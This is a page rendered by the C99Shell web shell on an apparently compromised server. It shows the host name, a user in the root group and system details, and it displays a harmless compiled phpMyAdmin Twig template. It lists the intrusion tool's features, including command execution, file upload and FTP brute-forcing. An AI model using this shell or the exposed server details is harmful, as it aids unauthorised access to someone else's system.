!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/public_html/phpmyadmin/tmp/twig/49/   drwxr-xr-x
Free 28.24 GB of 117.98 GB (23.93%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     49229cbadcfddb6e7272803eb19ccd9c.php (2.18 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

use Twig\Environment;
use 
Twig\Error\LoaderError;
use 
Twig\Error\RuntimeError;
use 
Twig\Extension\SandboxExtension;
use 
Twig\Markup;
use 
Twig\Sandbox\SecurityError;
use 
Twig\Sandbox\SecurityNotAllowedTagError;
use 
Twig\Sandbox\SecurityNotAllowedFilterError;
use 
Twig\Sandbox\SecurityNotAllowedFunctionError;
use 
Twig\Source;
use 
Twig\Template;

/* file_select_options.twig */
class __TwigTemplate_d2d01feb60e94eb9475aaf4653446763 extends Template
{
    private 
$source;
    private 
$macros = [];

    public function 
__construct(Environment $env)
    {
        
parent::__construct($env);

        
$this->source $this->getSourceContext();

        
$this->parent false;

        
$this->blocks = [
        ];
    }

    protected function 
doDisplay(array $context, array $blocks = [])
    {
        
$macros $this->macros;
        
// line 1
        
$context['_parent'] = $context;
        
$context['_seq'] = twig_ensure_traversable(($context["filesList"] ?? null));
        foreach (
$context['_seq'] as $context["_key"] => $context["file"]) {
            
// line 2
            
echo "  <option value=\"";
            echo 
twig_escape_filter($this->env$context["file"], "html"nulltrue);
            echo 
"\"";
            if ((
$context["file"] == ($context["active"] ?? null))) {
                echo 
" selected=\"selected\"";
            }
            echo 
">
    "
;
            
// line 3
            
echo twig_escape_filter($this->env$context["file"], "html"nulltrue);
            echo 
"
  </option>
"
;
        }
        
$_parent $context['_parent'];
        unset(
$context['_seq'], $context['_iterated'], $context['_key'], $context['file'], $context['_parent'], $context['loop']);
        
$context array_intersect_key($context$_parent) + $_parent;
    }

    public function 
getTemplateName()
    {
        return 
"file_select_options.twig";
    }

    public function 
isTraitable()
    {
        return 
false;
    }

    public function 
getDebugInfo()
    {
        return array (  
50 => 3,  41 => 2,  37 => 1,);
    }

    public function 
getSourceContext()
    {
        return new 
Source("""file_select_options.twig""/home/picotech/public_html/phpmyadmin/templates/file_select_options.twig");
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0038 ]--